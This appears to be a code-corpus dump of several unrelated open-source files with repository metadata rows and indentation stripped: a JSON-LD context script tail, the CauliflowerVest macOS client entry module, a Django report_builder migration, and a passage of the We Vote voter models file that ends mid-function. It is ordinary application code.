agri_type = f.split('AgriFood/')[1].split('/schema.json')[0]
if agri_type in terms_mappings:
return agri_url.format(terms_mappings[agri_type])
else:
return None
else:
return None
except UnboundLocalError:
pass
def write_context_file():
print('writing LD @context...' + ' size: ' + str(len(aggregated_context)))
ld_context = {
'@context': aggregated_context,
'generatedAt': datetime.now(timezone.utc).replace(microsecond=0).isoformat()
}
write_json(ld_context, 'context.jsonld')
write_yaml(terms_list, 'terms_list.yml')
def main(args):
uri_prefix = args.u
predefined_mappings = read_json('ldcontext_mappings.json')
terms_mappings = read_json('ldcontext_terms_mappings.json')
process_file(args.f, uri_prefix, predefined_mappings, terms_mappings)
write_context_file()
print("specification file was not found for this files")
print("\n".join(sorted(set(alert_list))))
# Entry point
if __name__ == '__main__':
parser = ArgumentParser()
parser.add_argument('-f', required=True, help='folder')
parser.add_argument('-u', required=True, help='URI prefix')
arguments = parser.parse_args()
main(arguments)
| mit | 1,676,945,092,126,814,700 | 28.383481 | 103 | 0.598434 | false |
google/cauliflowervest | cauliflowervest/client/mac/main.py | 1 | 3039 | # Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""CauliflowerVest client main entry module."""
import os
import pwd
from absl import app
from absl import flags
from cauliflowervest.client import base_flags
from cauliflowervest.client.mac import commandline
from cauliflowervest.client.mac import glue
from cauliflowervest.client.mac import tkinter
flags.DEFINE_bool('welcome', True, 'Show welcome message.')
flags.DEFINE_string(
'username', None, 'Username to use by default.', short_name='u')
flags.DEFINE_enum(
'action', None, commandline.ALL_ACTIONS.keys(),
'Action to perform (also suppresses GUI)', short_name='a')
flags.DEFINE_string('volume', None, 'UUID of volume')
exit_status = 1
def run_command_line(username, options):
"""Runs CauliflowerVest in command-line mode."""
if options.login_type == 'oauth2':
cmd = commandline.CommandLineOAuth2(options.server_url, username)
else:
raise NotImplementedError('Unsupported login type: %s',
options.login_type)
return cmd.Execute(options.action, options.volume)
def run_tkinter_gui(username, options):
"""Runs CauliflowerVest with a Tkinter GUI."""
if options.login_type == 'oauth2':
gui = tkinter.GuiOauth(options.server_url, username)
else:
raise NotImplementedError('Unsupported login type: %s',
options.login_type)
storage = glue.GetStorage()
if not storage:
gui.ShowFatalError('Could not determine File System type')
return 1
_, encrypted_volumes, _ = storage.GetStateAndVolumeIds()
try:
if encrypted_volumes:
gui.EncryptedVolumePrompt(status_callback=status_callback)
else:
gui.PlainVolumePrompt(options.welcome, status_callback=status_callback)
except Exception as e: # pylint: disable=broad-except
gui.ShowFatalError(e)
return 1
finally:
return exit_status # pylint: disable=lost-exception
def status_callback(status):
"""Callback routine to be passed into the gui to set the exit status.
Args:
status: Boolean: success or failure
"""
global exit_status
if status:
exit_status = 0
else:
exit_status = 1
@base_flags.HandleBaseFlags
def main(options):
if options.username:
username = options.username
else:
username = pwd.getpwuid(os.getuid()).pw_name
if options.action:
return run_command_line(username, options)
else:
return run_tkinter_gui(username, options)
if __name__ == '__main__':
app.run(main)
| apache-2.0 | -5,189,660,262,082,169,000 | 28.504854 | 77 | 0.715038 | false |
solvo/derb | report_builder/migrations/0001_initial.py | 1 | 11231 | # -*- coding: utf-8 -*-
# Generated by Django 1.10 on 2016-09-12 19:47
from __future__ import unicode_literals
from django.conf import settings
import django.contrib.postgres.fields.jsonb
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('async_notifications', '0002_auto_20160515_0018'),
('contenttypes', '0002_remove_content_type_name'),
]
operations = [
migrations.CreateModel(
name='Answer',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('annotation', models.TextField(blank=True)),
('text', models.TextField(blank=True)),
('display_text', models.TextField(blank=True)),
],
options={
'verbose_name_plural': 'Answers',
'verbose_name': 'Answer',
},
),
migrations.CreateModel(
name='Observation',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('text', models.TextField()),
('context', models.TextField()),
('aproved', models.BooleanField(default=False)),
('answer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='report_builder.Answer')),
],
options={
'verbose_name_plural': 'Observations',
'verbose_name': 'Observation',
},
),
migrations.CreateModel(
name='Project',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('description', models.CharField(max_length=500)),
('object_id', models.PositiveIntegerField()),
('content_type', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='contenttypes.ContentType')),
],
options={
'verbose_name_plural': 'Projects',
'verbose_name': 'Project',
},
),
migrations.CreateModel(
name='Question',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('class_to_load', models.CharField(max_length=30)),
('text', models.TextField()),
('help', models.TextField(blank=True)),
('answer_options', django.contrib.postgres.fields.jsonb.JSONField()),
('required', models.IntegerField(choices=[(0, 'Optional'), (1, 'Required'), (2, 'Required by hierarchy')], default=0)),
('order', models.CharField(blank=True, max_length=10)),
('auto', models.BooleanField(default=False)),
],
options={
'verbose_name_plural': 'Questions',
'verbose_name': 'Question',
},
),
migrations.CreateModel(
name='Report',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200)),
('template', django.contrib.postgres.fields.jsonb.JSONField(default=[{'human_name': 'General information', 'name': 'categ0', 'order': 0, 'subcategories': [{'human_name': 'General information', 'name': 'categ0_categ0', 'order': 0, 'question': [], 'questions': []}], 'subcategories_count': 1}])),
('questions', django.contrib.postgres.fields.jsonb.JSONField(default={})),
('opening_date', models.DateField()),
],
options={
'verbose_name_plural': 'Reports',
'verbose_name': 'Report',
},
),
migrations.CreateModel(
name='ReportByProject',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('start_date', models.DateField(verbose_name='Opening date')),
('submit_date', models.DateField(verbose_name='Submit date')),
('state', models.SmallIntegerField(choices=[(0, 'Submit pending'), (1, 'Unsubmitted'), (2, 'Aproved'), (3, 'Editing'), (4, 'Canceled'), (5, 'Rejected'), (6, 'In review')], default=0)),
('actions', models.TextField(blank=True, null=True)),
('review_percentage', models.SmallIntegerField(default=0)),
('complete', models.BooleanField(default=False)),
('make_another', models.BooleanField(default=False)),
('created_automatically', models.BooleanField(default=False)),
('creation_date', models.DateField(auto_now=True)),
('additional_info', models.TextField(blank=True, null=True)),
('project', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='report_builder.Project')),
('report', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='report_builder.Report')),
],
options={
'verbose_name_plural': 'Reports by project',
'verbose_name': 'Report by project',
},
),
migrations.CreateModel(
name='ReportType',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('type', models.TextField()),
('app_name', models.SlugField()),
('name', models.SlugField()),
('action_ok', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='action_ok', to='async_notifications.EmailTemplate')),
('report_end', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='report_end', to='async_notifications.EmailTemplate')),
('report_start', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='report_start', to='async_notifications.EmailTemplate')),
('responsable_change', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='responsable_change', to='async_notifications.EmailTemplate')),
('revision_turn', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='revision_turn', to='async_notifications.EmailTemplate')),
],
options={
'verbose_name_plural': 'Report types',
'verbose_name': 'Report type',
},
),
migrations.CreateModel(
name='Reviewer',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('order', models.SmallIntegerField(choices=[(1, 'First'), (2, 'Second'), (3, 'Third'), (4, 'Fourth'), (5, 'Fifth'), (6, 'Sixth'), (7, 'Seventh')])),
('state', models.SmallIntegerField(choices=[(0, 'Unsupported'), (1, 'Supported'), (2, 'In review'), (3, 'Supported by the system'), (4, 'Unsupported by the system')], default=0)),
('active', models.BooleanField(default=True)),
('make_observations', models.BooleanField(default=False)),
('can_ask', models.BooleanField(default=False)),
('can_review', models.BooleanField(default=False)),
('assigned_automatically', models.BooleanField(default=False)),
('report', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='report_builder.ReportByProject')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name_plural': 'Reviewers',
'verbose_name': 'Reviewer',
},
),
migrations.CreateModel(
name='RevisionTree',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('assignment_criteria', models.CharField(max_length=100)),
('description', models.TextField()),
('report_type', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='report_builder.ReportType')),
],
options={
'verbose_name_plural': 'Revision Tree',
'verbose_name': 'Revision Tree',
},
),
migrations.CreateModel(
name='RevisionTreeUser',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('order', models.SmallIntegerField(choices=[(1, 'First'), (2, 'Second'), (3, 'Third'), (4, 'Fourth'), (5, 'Fifth'), (6, 'Sixth'), (7, 'Seventh')])),
('make_observations', models.BooleanField(default=True)),
('can_ask', models.BooleanField(default=True)),
('can_review', models.BooleanField(default=True)),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name_plural': 'Revision Tree Users',
'verbose_name': 'Revision Tree User',
},
),
migrations.AddField(
model_name='revisiontree',
name='revision_tree_user',
field=models.ManyToManyField(to='report_builder.RevisionTreeUser'),
),
migrations.AddField(
model_name='report',
name='type',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='report_builder.ReportType'),
),
migrations.AddField(
model_name='question',
name='report',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='report_builder.Report'),
),
migrations.AddField(
model_name='observation',
name='reviewer',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='report_builder.Reviewer'),
),
migrations.AddField(
model_name='answer',
name='question',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='report_builder.Question'),
),
migrations.AddField(
model_name='answer',
name='report',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='report_builder.ReportByProject'),
),
migrations.AddField(
model_name='answer',
name='user',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
] | gpl-3.0 | -3,516,968,302,829,790,000 | 51.24186 | 310 | 0.562639 | false |
wevote/WebAppPublic | voter/models.py | 1 | 55344 | # voter/models.py
# Brought to you by We Vote. Be good.
# -*- coding: UTF-8 -*-
from django.db import models
from django.contrib.auth.models import (BaseUserManager, AbstractBaseUser) # PermissionsMixin
from django.core.validators import RegexValidator
from exception.models import handle_exception, handle_record_found_more_than_one_exception,\
handle_record_not_saved_exception
from validate_email import validate_email
import wevote_functions.admin
from wevote_functions.functions import convert_to_int, generate_voter_device_id, get_voter_device_id, \
get_voter_api_device_id, positive_value_exists
from wevote_settings.models import fetch_next_we_vote_id_last_voter_integer, fetch_site_unique_id_prefix
logger = wevote_functions.admin.get_logger(__name__)
# This way of extending the base user described here:
# https://docs.djangoproject.com/en/1.8/topics/auth/customizing/#a-full-example
# I then altered with this: http://buildthis.com/customizing-djangos-default-user-model/
# class VoterTwitterLink(models.Model):
# voter_id
# twitter_handle
# confirmed_signin_date
# See AUTH_USER_MODEL in config/base.py
class VoterManager(BaseUserManager):
def create_user(self, email=None, username=None, password=None):
"""
Creates and saves a User with the given email and password.
"""
email = self.normalize_email(email)
user = self.model(email=self.normalize_email(email))
# python-social-auth will pass the username and email
if username:
user.fb_username = username
user.set_password(password)
user.save(using=self._db)
return user
def create_superuser(self, email, password):
"""
Creates and saves a superuser with the given email and password.
"""
user = self.create_user(email, password=password)
user.is_admin = True
user.save(using=self._db)
return user
def create_voter(self, email=None, password=None):
email = self.normalize_email(email)
email_not_valid = False
password_not_valid = False
voter = Voter()
voter_id = 0
try:
if validate_email(email):
voter.email = email
else:
email_not_valid = True
if password:
voter.set_password(password)
else:
password_not_valid = True
voter.save()
voter_id = voter.id
except voter.IntegrityError as e:
handle_record_not_saved_exception(e, logger=logger)
try:
# Trying to save again will increment the 'we_vote_id_last_voter_integer'
# by calling 'fetch_next_we_vote_id_last_voter_integer'
# TODO We could get into a race condition where multiple creates could be failing at once, so we
# should look more closely at this
voter.save()
voter_id = voter.id
except voter.IntegrityError as e:
handle_record_not_saved_exception(e, logger=logger)
except Exception as e:
handle_record_not_saved_exception(e, logger=logger)
except Exception as e:
handle_record_not_saved_exception(e, logger=logger)
results = {
'email_not_valid': email_not_valid,
'password_not_valid': password_not_valid,
'voter_created': True if voter_id > 0 else False,
'voter': voter,
}
return results
def delete_voter(self, email):
email = self.normalize_email(email)
voter_id = 0
voter_we_vote_id = ''
voter_deleted = False
if positive_value_exists(email) and validate_email(email):
email_valid = True
else:
email_valid = False
try:
if email_valid:
results = self.retrieve_voter(voter_id, email, voter_we_vote_id)
if results['voter_found']:
voter = results['voter']
voter_id = voter.id
voter.delete()
voter_deleted = True
except Exception as e:
handle_exception(e, logger=logger)
results = {
'email_not_valid': True if not email_valid else False,
'voter_deleted': voter_deleted,
'voter_id': voter_id,
}
return results
def retrieve_voter_from_voter_device_id(self, voter_device_id):
voter_id = fetch_voter_id_from_voter_device_link(voter_device_id)
if not voter_id:
results = {
'voter_found': False,
'voter_id': 0,
'voter': Voter(),
}
return results
voter_manager = VoterManager()
results = voter_manager.retrieve_voter_by_id(voter_id)
if results['voter_found']:
voter_on_stage = results['voter']
voter_on_stage_found = True
voter_id = results['voter_id']
else:
voter_on_stage = Voter()
voter_on_stage_found = False
voter_id = 0
results = {
'voter_found': voter_on_stage_found,
'voter_id': voter_id,
'voter': voter_on_stage,
}
return results
def fetch_we_vote_id_from_local_id(self, voter_id):
results = self.retrieve_voter_by_id(voter_id)
if results['voter_found']:
voter = results['voter']
return voter.we_vote_id
else:
return None
def fetch_local_id_from_we_vote_id(self, voter_we_vote_id):
results = self.retrieve_voter_by_we_vote_id(voter_we_vote_id)
if results['voter_found']:
voter = results['voter']
return voter.id
else:
return 0
def retrieve_voter_by_id(self, voter_id):
email = ''
voter_we_vote_id = ''
voter_manager = VoterManager()
return voter_manager.retrieve_voter(voter_id, email, voter_we_vote_id)
def retrieve_voter_by_we_vote_id(self, voter_we_vote_id):
voter_id = ''
email = ''
voter_manager = VoterManager()
return voter_manager.retrieve_voter(voter_id, email, voter_we_vote_id)
def retrieve_voter_by_twitter_request_token(self, twitter_request_token):
voter_id = ''
email = ''
voter_we_vote_id = ''
voter_manager = VoterManager()
return voter_manager.retrieve_voter(voter_id, email, voter_we_vote_id, twitter_request_token)
def retrieve_voter_by_facebook_id(self, facebook_id):
voter_id = ''
email = ''
voter_we_vote_id = ''
twitter_request_token = ''
voter_manager = VoterManager()
return voter_manager.retrieve_voter(voter_id, email, voter_we_vote_id, twitter_request_token, facebook_id)
def retrieve_voter_by_twitter_id(self, twitter_id):
voter_id = ''
email = ''
voter_we_vote_id = ''
twitter_request_token = ''
facebook_id = 0
voter_manager = VoterManager()
return voter_manager.retrieve_voter(voter_id, email, voter_we_vote_id, twitter_request_token, facebook_id,
twitter_id)
def retrieve_voter_from_organization_we_vote_id(self, organization_we_vote_id):
voter_id = ''
email = ''
voter_we_vote_id = ''
twitter_request_token = ''
facebook_id = 0
twitter_id = 0
voter_manager = VoterManager()
return voter_manager.retrieve_voter(voter_id, email, voter_we_vote_id, twitter_request_token, facebook_id,
twitter_id, organization_we_vote_id)
def retrieve_voter(self, voter_id, email='', voter_we_vote_id='', twitter_request_token='', facebook_id=0,
twitter_id=0, organization_we_vote_id=''):
voter_id = convert_to_int(voter_id)
if not validate_email(email):
# We do not want to search for an invalid email
email = None
if positive_value_exists(voter_we_vote_id):
voter_we_vote_id = voter_we_vote_id.strip().lower()
if positive_value_exists(organization_we_vote_id):
organization_we_vote_id = organization_we_vote_id.strip().lower()
error_result = False
exception_does_not_exist = False
exception_multiple_object_returned = False
voter_on_stage = Voter()
try:
if positive_value_exists(voter_id):
voter_on_stage = Voter.objects.get(id=voter_id)
# If still here, we found an existing voter
voter_id = voter_on_stage.id
elif email is not '' and email is not None:
voter_on_stage = Voter.objects.get(
email=email)
# If still here, we found an existing voter
voter_id = voter_on_stage.id
elif positive_value_exists(voter_we_vote_id):
voter_on_stage = Voter.objects.get(
we_vote_id=voter_we_vote_id)
# If still here, we found an existing voter
voter_id = voter_on_stage.id
elif positive_value_exists(twitter_request_token):
voter_on_stage = Voter.objects.get(
twitter_request_token=twitter_request_token)
# If still here, we found an existing voter
voter_id = voter_on_stage.id
elif positive_value_exists(facebook_id):
voter_on_stage = Voter.objects.get(
facebook_id=facebook_id)
# If still here, we found an existing voter
voter_id = voter_on_stage.id
elif positive_value_exists(twitter_id):
voter_on_stage = Voter.objects.get(
twitter_id=twitter_id)
# If still here, we found an existing voter
voter_id = voter_on_stage.id
elif positive_value_exists(organization_we_vote_id):
voter_on_stage = Voter.objects.get(
linked_organization_we_vote_id=organization_we_vote_id)
# If still here, we found an existing voter
voter_id = voter_on_stage.id
else:
voter_id = 0
error_result = True
except Voter.MultipleObjectsReturned as e:
handle_record_found_more_than_one_exception(e, logger=logger)
error_result = True
exception_multiple_object_returned = True
except Voter.DoesNotExist as e:
error_result = True
exception_does_not_exist = True
results = {
'error_result': error_result,
'DoesNotExist': exception_does_not_exist,
'MultipleObjectsReturned': exception_multiple_object_returned,
'voter_found': True if voter_id > 0 else False,
'voter_id': voter_id,
'voter': voter_on_stage,
}
return results
def create_voter_with_voter_device_id(self, voter_device_id):
logger.info("create_voter_with_voter_device_id(voter_device_id)")
def clear_out_abandoned_voter_records(self):
# We will need a method that identifies and deletes abandoned voter records that don't have enough information
# to ever be used
logger.info("clear_out_abandoned_voter_records")
def save_facebook_user_values(self, voter, facebook_id, facebook_email=''):
try:
if facebook_id == 0:
voter.facebook_id = 0
elif positive_value_exists(facebook_id):
voter.facebook_id = facebook_id
if facebook_email == '' or facebook_email is False:
voter.facebook_email = ''
elif positive_value_exists(facebook_email):
voter.facebook_email = facebook_email
voter.save()
success = True
status = "SAVED_VOTER_FACEBOOK_VALUES"
except Exception as e:
status = "UNABLE_TO_SAVE_VOTER_FACEBOOK_VALUES"
success = False
handle_record_not_saved_exception(e, logger=logger, exception_message_optional=status)
results = {
'status': status,
'success': success,
'voter': voter,
}
return results
def save_twitter_user_values(self, voter, twitter_user_object):
try:
# 'id': 132728535,
if positive_value_exists(twitter_user_object.id):
voter.twitter_id = twitter_user_object.id
# 'id_str': '132728535',
# 'utc_offset': 32400,
# 'description': "Cars, Musics, Games, Electronics, toys, food, etc... I'm just a typical boy!",
# 'profile_image_url': 'http://a1.twimg.com/profile_images/1213351752/_2_2__normal.jpg',
if positive_value_exists(twitter_user_object.profile_image_url_https):
voter.twitter_profile_image_url_https = twitter_user_object.profile_image_url_https
# 'profile_background_image_url': 'http://a2.twimg.com/a/1294785484/images/themes/theme15/bg.png',
# 'screen_name': 'jaeeeee',
if positive_value_exists(twitter_user_object.screen_name):
voter.twitter_screen_name = twitter_user_object.screen_name
# 'lang': 'en',
# 'name': 'Jae Jung Chung',
# 'url': 'http://www.carbonize.co.kr',
# 'time_zone': 'Seoul',
voter.save()
success = True
status = "SAVED_VOTER_TWITTER_VALUES"
except Exception as e:
status = "UNABLE_TO_SAVE_VOTER_TWITTER_VALUES"
success = False
handle_record_not_saved_exception(e, logger=logger, exception_message_optional=status)
results = {
'status': status,
'success': success,
'voter': voter,
}
return results
def save_twitter_user_values_from_dict(self, voter, twitter_user_dict):
try:
# 'id': 132728535,
if 'id' in twitter_user_dict:
voter.twitter_id = twitter_user_dict['id']
# 'id_str': '132728535',
# 'utc_offset': 32400,
# 'description': "Cars, Musics, Games, Electronics, toys, food, etc... I'm just a typical boy!",
# 'profile_image_url': 'http://a1.twimg.com/profile_images/1213351752/_2_2__normal.jpg',
if 'profile_image_url_https' in twitter_user_dict:
voter.twitter_profile_image_url_https = twitter_user_dict['profile_image_url_https']
# 'profile_background_image_url': 'http://a2.twimg.com/a/1294785484/images/themes/theme15/bg.png',
# 'screen_name': 'jaeeeee',
if 'screen_name' in twitter_user_dict:
voter.twitter_screen_name = twitter_user_dict['screen_name']
# 'lang': 'en',
# 'name': 'Jae Jung Chung',
# 'url': 'http://www.carbonize.co.kr',
# 'time_zone': 'Seoul',
voter.save()
success = True
status = "SAVED_VOTER_TWITTER_VALUES"
except Exception as e:
status = "UNABLE_TO_SAVE_VOTER_TWITTER_VALUES"
success = False
handle_record_not_saved_exception(e, logger=logger, exception_message_optional=status)
results = {
'status': status,
'success': success,
'voter': voter,
}
return results
def update_voter_photos(self, voter_id, facebook_profile_image_url_https, facebook_photo_variable_exists):
results = self.retrieve_voter(voter_id)
if results['voter_found']:
voter = results['voter']
try:
if facebook_photo_variable_exists:
voter.facebook_profile_image_url_https = facebook_profile_image_url_https
voter.save()
status = "SAVED_VOTER_PHOTOS"
success = True
except Exception as e:
status = "UNABLE_TO_SAVE_VOTER_PHOTOS"
success = False
handle_record_not_saved_exception(e, logger=logger, exception_message_optional=status)
else:
# If here, we were unable to find pre-existing Voter
status = "UNABLE_TO_FIND_VOTER_FOR_UPDATE_VOTER_PHOTOS"
voter = Voter()
success = False
results = {
'status': status,
'success': success,
'voter': voter,
}
return results
def update_voter(self, voter_id, facebook_email, facebook_profile_image_url_https,
first_name, middle_name, last_name,
twitter_profile_image_url_https):
voter_updated = False
results = self.retrieve_voter(voter_id)
if results['voter_found']:
voter = results['voter']
try:
should_save_voter = False
if facebook_email is not False:
voter.facebook_email = facebook_email
should_save_voter = True
if facebook_profile_image_url_https is not False:
voter.facebook_profile_image_url_https = facebook_profile_image_url_https
should_save_voter = True
if first_name is not False:
voter.first_name = first_name
should_save_voter = True
if middle_name is not False:
voter.middle_name = middle_name
should_save_voter = True
if last_name is not False:
voter.last_name = last_name
should_save_voter = True
if twitter_profile_image_url_https is not False:
voter.last_name = last_name
should_save_voter = True
if should_save_voter:
voter.save()
voter_updated = True
status = "UPDATED_VOTER"
success = True
except Exception as e:
status = "UNABLE_TO_UPDATE_VOTER"
success = False
voter_updated = False
else:
# If here, we were unable to find pre-existing Voter
status = "UNABLE_TO_FIND_VOTER_FOR_UPDATE_VOTER"
voter = Voter()
success = False
voter_updated = False
results = {
'status': status,
'success': success,
'voter': voter,
'voter_updated': voter_updated,
}
return results
class Voter(AbstractBaseUser):
"""
A fully featured User model with admin-compliant permissions that uses
a full-length email field as the username.
No fields are required, since at its very simplest, we only need the voter_id based on a voter_device_id.
"""
alphanumeric = RegexValidator(r'^[0-9a-zA-Z]*$', message='Only alphanumeric characters are allowed.')
# The we_vote_id identifier is unique across all We Vote sites, and allows us to share our voter info with other
# organizations running the we_vote server
# It starts with "wv" then we add on a database specific identifier like "3v" (WeVoteSetting.site_unique_id_prefix)
# then the string "voter", and then a sequential integer like "123".
# We keep the last value in WeVoteSetting.we_vote_id_last_org_integer
we_vote_id = models.CharField(
verbose_name="we vote permanent id", max_length=255, null=True, blank=True, unique=True)
# When a person using an organization's Twitter handle signs in, we create a voter account. This is how
# we link the voter account to the organization.
linked_organization_we_vote_id = models.CharField(
verbose_name="we vote id for linked organization", max_length=255, null=True, blank=True, unique=True)
# Redefine the basic fields that would normally be defined in User
# username = models.CharField(unique=True, max_length=20, validators=[alphanumeric]) # Increase max_length to 255
email = models.EmailField(verbose_name='email address', max_length=255, unique=True, null=True, blank=True)
first_name = models.CharField(verbose_name='first name', max_length=255, null=True, blank=True)
middle_name = models.CharField(max_length=255, null=True, blank=True)
last_name = models.CharField(verbose_name='last name', max_length=255, null=True, blank=True)
date_joined = models.DateTimeField(verbose_name='date joined', auto_now_add=True)
is_active = models.BooleanField(default=True)
is_admin = models.BooleanField(default=False)
is_verified_volunteer = models.BooleanField(default=False)
# Facebook session information
facebook_id = models.BigIntegerField(verbose_name="facebook big integer id", null=True, blank=True)
facebook_email = models.EmailField(verbose_name='facebook email address', max_length=255, unique=False,
null=True, blank=True)
fb_username = models.CharField(unique=True, max_length=20, validators=[alphanumeric], null=True)
facebook_profile_image_url_https = models.URLField(verbose_name='url of image from facebook', blank=True, null=True)
# Twitter session information
twitter_id = models.BigIntegerField(verbose_name="twitter big integer id", null=True, blank=True)
twitter_screen_name = models.CharField(verbose_name='twitter screen name / handle',
max_length=255, null=True, unique=False)
twitter_profile_image_url_https = models.URLField(verbose_name='url of logo from twitter', blank=True, null=True)
twitter_request_token = models.TextField(verbose_name='twitter request token', null=True, blank=True)
twitter_request_secret = models.TextField(verbose_name='twitter request secret', null=True, blank=True)
twitter_access_token = models.TextField(verbose_name='twitter access token', null=True, blank=True)
twitter_access_secret = models.TextField(verbose_name='twitter access secret', null=True, blank=True)
twitter_connection_active = models.BooleanField(default=False)
# Custom We Vote fields
# image_displayed
# image_twitter
# image_facebook
# blocked
# flags (ex/ signed_in)
# password_hashed
# password_reset_key
# password_reset_request_time
# last_activity
# The unique ID of the election this voter is currently looking at. (Provided by Google Civic)
# DALE 2015-10-29 We are replacing this with looking up the value in the ballot_items table, and then
# storing in cookie
# current_google_civic_election_id = models.PositiveIntegerField(
# verbose_name="google civic election id", null=True, unique=False)
objects = VoterManager()
USERNAME_FIELD = 'email'
REQUIRED_FIELDS = [] # Since we need to store a voter based solely on voter_device_id, no values are required
# We override the save function to allow for the email field to be empty. If NOT empty, email must be unique.
# We also want to auto-generate we_vote_id
def save(self, *args, **kwargs):
if self.email:
self.email = self.email.lower().strip() # Hopefully reduces junk to ""
if self.email != "": # If it's not blank
if not validate_email(self.email): # ...make sure it is a valid email
# If it isn't a valid email, don't save the value as an email -- just save a blank field
self.email = None
if self.email == "":
self.email = None
if self.we_vote_id:
self.we_vote_id = self.we_vote_id.strip().lower()
if self.we_vote_id == "" or self.we_vote_id is None: # If there isn't a value...
# ...generate a new id
site_unique_id_prefix = fetch_site_unique_id_prefix()
next_local_integer = fetch_next_we_vote_id_last_voter_integer()
# "wv" = We Vote
# site_unique_id_prefix = a generated (or assigned) unique id for one server running We Vote
# "voter" = tells us this is a unique id for an org
# next_integer = a unique, sequential integer for this server - not necessarily tied to database id
self.we_vote_id = "wv{site_unique_id_prefix}voter{next_integer}".format(
site_unique_id_prefix=site_unique_id_prefix,
next_integer=next_local_integer,
)
# TODO we need to deal with the situation where we_vote_id is NOT unique on save
super(Voter, self).save(*args, **kwargs)
def get_full_name(self):
full_name = self.first_name if positive_value_exists(self.first_name) else ''
full_name += " " if positive_value_exists(self.first_name) and positive_value_exists(self.last_name) else ''
full_name += self.last_name if positive_value_exists(self.last_name) else ''
return full_name
def get_short_name(self):
# return self.first_name
# The user is identified by their email address
return self.email
def voter_can_retrieve_account(self):
if positive_value_exists(self.email):
return True
else:
return False
def __str__(self): # __unicode__ on Python 2
# return self.get_full_name(self)
return str(self.email)
def has_perm(self, perm, obj=None):
"""
Does the user have a specific permission?
"""
# Simplest possible answer: Yes, always
return True
def has_module_perms(self, app_label):
"""
Does the user have permissions to view the app `app_label`?
"""
# Simplest possible answer: Yes, always
return True
@property
def is_staff(self):
"""
Is the user a member of staff?
"""
# Simplest possible answer: All admins are staff
return self.is_admin
def voter_photo_url(self):
if self.facebook_profile_image_url_https:
return self.facebook_profile_image_url_https
elif self.twitter_profile_image_url_https:
return self.twitter_profile_image_url_https
return ''
def signed_in_personal(self):
if positive_value_exists(self.email) or self.signed_in_facebook() or self.signed_in_twitter():
# or positive_value_exists(self.is_authenticated()):
return True
return False
def signed_in_facebook(self):
if positive_value_exists(self.facebook_id):
return True
return False
def signed_in_google(self):
return False
def signed_in_twitter(self):
if positive_value_exists(self.twitter_access_token):
return True
return False
class VoterDeviceLink(models.Model):
"""
There can be many voter_device_id's for every voter_id. (See commentary in class VoterDeviceLinkManager)
"""
# The id for this object is not used in any searches
# A randomly generated identifier that gets stored as a cookie on a single device
# See wevote_functions.functions, function generate_voter_device_id for a discussion of voter_device_id length
voter_device_id = models.CharField(verbose_name='voter device id',
max_length=255, null=False, blank=False, unique=True)
# The voter_id associated with voter_device_id
voter_id = models.BigIntegerField(verbose_name="voter unique identifier", null=False, blank=False, unique=False)
# The unique ID of the election (provided by Google Civic) that the voter is looking at on this device
google_civic_election_id = models.PositiveIntegerField(
verbose_name="google civic election id", default=0, null=False)
def generate_voter_device_id(self):
# A simple mapping to this function
return generate_voter_device_id()
class VoterDeviceLinkManager(models.Model):
"""
In order to start gathering information about a voter prior to authentication, we use a long randomized string
stored as a browser cookie. As soon as we get any other identifiable information from a voter (like an email
address), we capture that so the Voter record can be portable among devices. Note that any voter might be using
We Vote from different browsers. The VoterDeviceLink links one or more voter_device_id's to one voter_id.
Since (prior to authentication) every voter_device_id will have its own voter_id record, we merge and delete Voter
records whenever we can.
"""
def __str__(self): # __unicode__ on Python 2
return "Voter Device Id Manager"
def delete_all_voter_device_links(self, voter_device_id):
voter_id = fetch_voter_id_from_voter_device_link(voter_device_id)
try:
if positive_value_exists(voter_id):
VoterDeviceLink.objects.filter(voter_id=voter_id).delete()
